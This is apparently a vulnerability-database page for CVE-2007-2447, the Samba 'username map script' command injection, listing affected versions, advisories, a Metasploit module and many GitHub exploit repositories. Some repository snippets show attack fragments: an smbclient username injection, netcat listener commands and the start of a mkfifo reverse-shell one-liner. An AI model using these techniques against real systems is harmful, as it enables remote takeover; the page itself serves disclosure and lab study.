6
CVSSv2

CVE-2007-2447

Published: 14/05/2007 Updated: 16/10/2018
CVSS v2 Base Score: 6 | Impact Score: 6.4 | Exploitability Score: 6.8
VMScore: 618
Vector: AV:N/AC:M/Au:S/C:P/I:P/A:P

Vulnerability Summary

The MS-RPC functionality in smbd in Samba 3.0.0 up to and including 3.0.25rc3 allows remote malicious users to execute arbitrary commands via shell metacharacters involving the (1) SamrChangePassword function, when the "username map script" smb.conf option is enabled, and allows remote authenticated users to execute commands via shell metacharacters involving other MS-RPC functions in the (2) remote printer and (3) file share management.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

samba samba 3.0.13

samba samba 3.0.14

samba samba 3.0.2

samba samba 3.0.20

samba samba 3.0.22

samba samba 3.0.23

samba samba 3.0.23a

samba samba 3.0.25

samba samba 3.0.6

samba samba 3.0.7

samba samba 3.0.0

samba samba 3.0.14a

samba samba 3.0.15

samba samba 3.0.20a

samba samba 3.0.20b

samba samba 3.0.23b

samba samba 3.0.23c

samba samba 3.0.2a

samba samba 3.0.8

samba samba 3.0.9

samba samba 3.0.11

samba samba 3.0.12

samba samba 3.0.18

samba samba 3.0.19

samba samba 3.0.21b

samba samba 3.0.21c

samba samba 3.0.4

samba samba 3.0.5

samba samba 3.0.1

samba samba 3.0.10

samba samba 3.0.16

samba samba 3.0.17

samba samba 3.0.21

samba samba 3.0.21a

samba samba 3.0.23d

samba samba 3.0.24

samba samba 3.0.3

Vendor Advisories

Paul Griffith and Andrew Hogue discovered that Samba did not fully drop root privileges while translating SIDs A remote authenticated user could issue SMB operations during a small window of opportunity and gain root privileges (CVE-2007-2444) ...
Several issues have been identified in Samba, the SMB/CIFS file- and print-server implementation for GNU/Linux CVE-2007-2444 When translating SIDs to/from names using Samba local list of user and group accounts, a logic error in the smbd daemon's internal security stack may result in a transition to the root user id rather than the ...

Exploits

## # $Id: usermap_scriptrb 10040 2010-08-18 17:24:46Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions Please see the Metasploit # Framework web site for more information on licensing and terms of use # metasploitcom/framework/ ## require 'msf/core' class ...
This Metasploit module exploits a command execution vulnerability in Samba versions 300 through 3025rc3 when using the non-default "username map script" configuration option By specifying a username containing shell meta characters, attackers can execute arbitrary commands No authentication is needed to exploit this vulnerability since this o ...

Github Repositories

A simple exploit for CVE-2007-2447

smb_usermap A simple exploit for CVE-2007-2447, present in Samba 3020 You can exploit this vuln with even less than this, for instance, with smbclient, but I think it's tough to do complex commands, since a lot of special chars probably get eaten, but a simple command (reboot in this case) can be passed like this: smbclient -L <target IP> --user="/=\`

Remote Command Injection Vulnerability (CVE-2007-2447), allows remote attackers to execute arbitrary commands by specifying a Samba username containing shell meta characters.

CVE-2007-2447 Remote Command Injection Vulnerability (CVE-2007-2447), allows remote attackers to execute arbitrary commands by specifying a Samba username containing shell meta characters

Various methods to own the Metasploitable 2 box

PenTest_Metasploitable2 & others Various methods to own the Metasploitable 2 box Getting Started Just started penetration testing, below are various methods that I am using to own the box You can see this more like my personal guidlines and what worked for me rather than a guide/solutions to own the box Discovery Scan nmap -sV 192168113

Samba Reverse Shell

Poc exploit(bash script) Screencastfrom2023-09-1417-40-22webm About the exploit install the package with pip in requirementstxt file You can get reverse shell with py file in (Windows and Linux) (in windows, you need to install netcat) using for py: 1st terminal: nc -lnvp your_port 2nd terminal: python usermappy Exploit Title: CV

1° Start listening netcat: Choose whetever port you want, it will be important for the exploitation that you grant you an root shell, will use 4242 as example nc -lnpt 4242 2° Execute the exploit: You just need to execute the exploit and provide the necessary informations requested by it python3 CVE-2007-2447py

CVE-2007-2447 samba remote code execution

CVE-2007-2447 Samba 300 - 3025rc3 are subject for Remote Command Injection Vulnerability (CVE-2007-2447), allows remote attackers to execute arbitrary commands by specifying a username containing shell meta characters

CVE-2007-2447 python3 smb3020py -lh 10101414 -lp 4444 -t 10129588

Домашнее задание к занятию 131 "Уязвимости и атаки на информационные системы" Домашнее задание выполните в Google Docs и отправьте в личном кабинете на проверку ссылку на ваш документ Название файла должно с

Exploits written by oscar-rk

Exploits Exploits written by oscar-rk CVE-2007-2447sh --- Abuses SMB usermap command injection to obtain RCE (Samba 300 through 3025rc3)

CVE-2007-2447 - Samba usermap script

CVE-2007-2447 CVE-2007-2447 - Samba usermap script alien0nedigitalpressblog/cve-2007-2447/ Usage: $ python3 scriptpy <rhost> <rport> <lhost> <lport> rhost -> The target address rport -> The target port lhost -> The listener address lport ->

Enumeration/Scanning This is the second phase of hacking where by it includes scanning the target and enumerating services Port Scanning : 1 nmap -sC -sV -o nmap -A -T5 101010x 2 Host Discovery • nmap -sn 101011-254 -vv -oA hosts • netdiscover -r 1010100/24 3 DNS server discovery • nmap -p 53 1010101-254 -vv -oA dcs 4 NSE Scri

Exploit code for CVE-2007-2447 written in Python3.

CVE-2007-2447 - Samba 3020 < 3025rc3 - 'Username' map script' Command Execution Introduction This repository contains my exploit code for CVE-2007-2447 written in Python3 By default it sends a Netcat OpenBSD reverse shell on port 443 to the target host, but you can also specify a custom command # Netcat OpenBSD reverse shell rm /tmp/f;mkfifo /tmp/f;c

1° Start listening netcat: Choose whetever port you want, it will be important for the exploitation that you grant you an root shell, will use 4242 as example nc -lnpt 4242 2° Execute the exploit: You just need to execute the exploit and provide the necessary informations requested by it python3 CVE-2007-2447py

Samba 3.0.20 username map script exploit

CVE-2007-2447 Samba 3020 username map script exploit made for the "Lame" machine on HackTheBox solely for learning purposes Usage Replace shell code in samba-username-map-scriptpy with your own Start listener on the port of your choice (must correspond to your shell code) python3 samba-username-map-scriptpy 1010103

exploits-and-stuff Bludit392PassBruteForcepy Bypasses anti-brute forcing mechanism of Bludit CMS v 392 and brute forces a working password CVE-2019-17240 : Check rastating's blog for more information UsernameMapScriptpy Exploits RCE vulnerability in Samba v 3020-3025rc3, through username map script configuration and sends a reverse shell to the attacker CVE-2

samba-usermap-script Name: Samba "username map script" Command Execution Supported Architecture: cmd Supported Platform: Unix Target Service / protocol: microsoft-ds, netbios-ssn Target Network Port(s): 139, 445 List of CVEs: CVE-2007-2447 This script will exploit a command execution vulnerability in Samba versions 3020 through 3025rc when using the non-defa

automated script for exploiting CVE-2007-2447

CVE-2007-2447 Saikat Karmakar | Oct 14 : 2022 Usage: python3 exploit-smb-3020py -lh <your ip> -lp <your listner port> -t <target ip> requirements pysmb argparse PS I'm not the author of this cve I barely had a computer when this cve was created

ExploitDev Journey #6 | CVE-2007-2447 | Samba 3020 < 3025rc 'Username' map script' Command Execution Original Exploit: wwwexploit-dbcom/exploits/16320 Exploit name: Samba username map script RCE CVE: 2007-2447 Lab: Lame - HackTheBox Description There is a vulnerability in Samba versions below 3025 that allows an attacker to execute syste

CVE-2007-2447 - Samba usermap script

CVE-2007-2447 CVE-2007-2447 - Samba usermap script amriunixcom/post/cve-2007-2447-samba-usermap-script/ Usage: $ python usermap_scriptpy <RHOST> <RPORT> <LHOST> <LPORT> RHOST -- The target address RPORT -- The target port (TCP : 139) LHOST -- The listen address LPORT -- T

CVE-2007-2447 'Username' map script' Command Execution 300 - 3025rc3 3020 - 3025rc3 AMRIUNIX

Python implementation of 'Username' map script' RCE Exploit for Samba 3.0.20 < 3.0.25rc3 (CVE-2007-2447).

CVE-2007-2447 - Python implementation Description Python implementation of 'Username' map script' RCE Exploit for Samba 3020 &lt; 3025rc3 (CVE-2007-2447) Usage python3 smbExploitpy &lt;IP&gt; &lt;PORT&gt; &lt;PAYLOAD&gt; IP - Ip of the remote machine PORT - (Optional) Port that smb is running on PAYLOAD - Payload to be execute

Exploit Samba

CVE-2007-2447 Exploit Samba

CTF Writeups written by oscar-rk

CTF Writeups by oscar-rk You can search keywords and/or topics between writeups using top left corner search bar Dashboard Box Writeup OS Difficulty Tags Archetype Starting Point SMB EnumerationMicrosoft SQL Server RCEImpacketWinPEAS Windows Enumeration Vaccine Starting Point FTP EnumerationCracking hashes with JohnSQLMAP SQL InjectionAbusing sudo privileges

CVE-2007-2447 - username map script "The MS-RPC functionality in smbd in Samba 300 through 3025rc3 allows remote attackers to execute arbitrary commands via shell metacharacters involving the (1) SamrChangePassword function, when the "username map script" smbconf option is enabled, and allows remote authenticated users to execute commands via shell metachara

CVE-2007-2447

CVE-2007-2447 - Samba usermap exploit Usage: $ python3 exploitpy &lt;RHOST&gt; &lt;RPORT&gt; &lt;LHOST&gt; &lt;LPORT&gt; RHOST -- The target address RPORT -- The target port (TCP : 139) LHOST -- The listen address LPORT -- The listen port Installation git clone githubcom/Nosferatuvjr/Samba-User

Exploit i used in HTB

CVE-2007-2447_python Exploit i used in HTB

ExploitDev Journey #6 | CVE-2007-2447 | Samba 3020 &lt; 3025rc 'Username' map script' Command Execution Original Exploit: wwwexploit-dbcom/exploits/16320 Exploit name: Samba username map script RCE CVE: 2007-2447 Lab: Lame - HackTheBox Description There is a vulnerability in Samba versions below 3025 that allows an attacker to execute syste

CVE-2007-2447 To test the script I recommend you the virtual machine "metasploitable 2" available here The script will display a reverse shell if the exploit works To get the connection, just open a netcat session like : netcat -lnvp &lt;port&gt; Table of contents Exemples Requirements Payloads Examples py CVE-2007-2

cve-2007-2447 this script was rewrite the part of Metasploit modules to python3

Sambaster cve-2007-2447 Samba 3020 requirement module: pysmb if you not installed it: pip3 install pysmb Usage: python3 sambasterpy &lt;rhost&gt; &lt;rport&gt; &lt;lhost&gt; &lt;lport&gt;

Haskell implementation of Metasploit remote API

MSF-Haskell Introduction This directory contains the Haskell Metasploit binding and library as well as a whitepaper describing the purpose and use of the library In brief, the Metasploit Framework (MSF) is a widely deployed open source penetration testing platform Much of the functionality of the framework is provided by a remote procedure call (RPC) interface via the standar

HTB write-ups going through TJnull's VM list on HackTheBox.

HackTheBox Writeups A collection of write-ups going through TJnull's VM list for machines hosted on HackTheBox Linux Boxes Machine Tags Writeup #CVE-2004-2687 #CVE-2007-2447 #CVE-2011-2523 #vsFTPd #smbd #nmap HTB Lame #shellshock #CVE-2014-6271 #perl HTB Shocker HTB Bashed #mimebypass #ifcfg HTB Networked Windows Boxes

CVE-2007-2447 exploit written in python to get reverse shell

PyUsernameMapScriptRCE CVE-2007-2447 exploit written in python to get reverse shell

WriteUps for some of the HackTheBox boxes I've done.

HackTheBox-WriteUps WriteUps for some of the HackTheBox boxes I've done (level of detail depends on my mood at the time of doing the box) HTB profile: OneJump Boxes Very Easy Starting Point - ArcheType - Missconfigured share, impacket mssqlclient and xp_cmdshell, priv esc with PS history Starting Point - Oopsie - Web parameter tampering, unrestricted file upload, priv es

Samba usermap script.

CVE-2007-2447 CVE-2007-2447 - Samba usermap script amriunixcom/post/cve-2007-2447-samba-usermap-script/ Usage: $ python usermap_scriptpy &lt;RHOST&gt; &lt;RPORT&gt; &lt;LHOST&gt; &lt;LPORT&gt; RHOST -- The target address RPORT -- The target port (TCP : 139) LHOST -- The listen address LPORT -- T

Penetration-Testing-Week-16 Unit 16 HW Submission File: Penetration Testing Scenario In this assignment, you will work as a recently hired security analyst at Altoro Mutual, a banking service Concerned about their online presence and the security of their website demotestfirenet, they have hired you to evaluate the security posture of their operations As a holder ve

Samba 3.0.0 - 3.0.25rc3

CVE-2007-2447 Requisites pysmb Information The CVE-2007-2447 affects Samba from version 300 to 3025rc3 It allows attackers to execute shell commands in the username parameter Usage Open a listening port of your choice, set up the variables in the script and execute the script

Hack the Box Ethical Hacking - Lame the targeted machine is Lame nmap First thing first, we run a quick initial nmap scan to see whihc ports are open and which services are running on those ports Run nmap to scan the machin nmap -vvv -n -Pn -p0-65535 -oG allPolrs 10129114132 # Nmap 792 scan initiated Sat Apr 9 05:28:51 2022 as: nmap -vvv -n -Pn -p0-65535 -oG allPolrs 1

Lame HTB Aujourd'hui, intéressons-nous à une autre machine HackTheBox facile créée par ch4p, Lame Nous avons l'ip (1010103) et l'OS (Linux) Après avoir lancer le même script de découverte de ports utilisé pour Legacy, le scan nous donne le nom de la machine (lame), du domaine (hacktheboxgr) et du domai

This is the assessment project for the Ethical Hacking Bootcamp by techcareer I wrote two exploits for vulnerabilities in FTP / vsftpd 234 (CVE-2011-2523) and Samba 300–3025rc3 (CVE-2007-2447) services Below is given how to run the script For FTP: python mainpy -s ftp -rhost &lt;host_ip&gt; -rport &lt;host_port&gt; For Samba: python mainpy -s sa

Exploit for the vulnerability CVE-2007-2447

exploit-CVE-2007-2447 Exploit for the vulnerability CVE-2007-2447 Created by: @xlcc4096 @CapitanJ4ck21 @CapitanJ4ck21 -&gt; githubcom/Th3FirstAvenger

Samba CVE-2007-2447 Exploit This is a Python script for exploiting CVE-2007-2447, a vulnerability known as 'Username' map script command execution in the Samba server Description This exploit is developed to target Samba versions 3x - 4x CVE-2007-2447 allows an attacker to execute arbitrary commands on a vulnerable Samba server by crafting a malicious username and

Penetration Testing Overview Enumeration Exploitation Lateral Movement Privilege Escalation Brute Force File Transfers Restricted Shell Escapes Reverse Shells Online Resources Browser Plugins Exploits #1 - Enumeration Nmap $ nmap -sC -sV -p- -Pn -A &lt;IP address&gt; $ nmap -sC -sV -p- -Pn -A -sU &lt;IP address&gt

References

NVD-CWE-Otherhttp://www.samba.org/samba/security/CVE-2007-2447.htmlhttp://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534https://issues.rpath.com/browse/RPL-1366http://www.redhat.com/support/errata/RHSA-2007-0354.htmlhttp://slackware.com/security/viewer.php?l=slackware-security&y=2007&m=slackware-security.475906http://www.kb.cert.org/vuls/id/268336http://www.securityfocus.com/bid/23972http://secunia.com/advisories/25241http://secunia.com/advisories/25246http://secunia.com/advisories/25256http://secunia.com/advisories/25257http://www.debian.org/security/2007/dsa-1291http://security.gentoo.org/glsa/glsa-200705-15.xmlhttp://www.trustix.org/errata/2007/0017/http://www.ubuntu.com/usn/usn-460-1http://www.osvdb.org/34700http://www.securitytracker.com/id?1018051http://secunia.com/advisories/25232http://secunia.com/advisories/25251http://secunia.com/advisories/25270http://secunia.com/advisories/25259http://secunia.com/advisories/25255http://lists.grok.org.uk/pipermail/full-disclosure/2007-September/065902.htmlhttp://docs.info.apple.com/article.html?artnum=306172http://lists.apple.com/archives/security-announce//2007/Jul/msg00004.htmlhttp://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?lang=en&cc=us&objectID=c01078980http://www.mandriva.com/security/advisories?name=MDKSA-2007:104http://www.openpkg.com/security/advisories/OpenPKG-SA-2007.012.htmlhttp://sunsolve.sun.com/search/document.do?assetkey=1-26-102964-1http://lists.suse.com/archive/suse-security-announce/2007-May/0006.htmlhttp://www.novell.com/linux/security/advisories/2007_14_sr.htmlhttp://www.securityfocus.com/bid/25159http://secunia.com/advisories/25289http://secunia.com/advisories/25567http://secunia.com/advisories/25675http://secunia.com/advisories/25772http://secunia.com/advisories/26083http://secunia.com/advisories/26235http://secunia.com/advisories/26909http://secunia.com/advisories/27706http://securityreason.com/securityalert/2700http://www.xerox.com/downloads/usa/en/c/cert_XRX08_001.pdfhttp://secunia.com/advisories/28292http://sunsolve.sun.com/search/document.do?assetkey=1-66-200588-1http://www.vupen.com/english/advisories/2007/2281http://www.vupen.com/english/advisories/2007/3229http://www.vupen.com/english/advisories/2007/2210http://www.vupen.com/english/advisories/2007/1805http://www.vupen.com/english/advisories/2007/2079http://www.vupen.com/english/advisories/2007/2732http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?lang=en&cc=us&objectID=c01067768http://www.vupen.com/english/advisories/2008/0050https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10062http://www.securityfocus.com/archive/1/468670/100/0/threadedhttp://www.securityfocus.com/archive/1/468565/100/0/threadedhttps://usn.ubuntu.com/460-1/https://nvd.nist.govhttps://www.exploit-db.com/exploits/16320/https://www.kb.cert.org/vuls/id/268336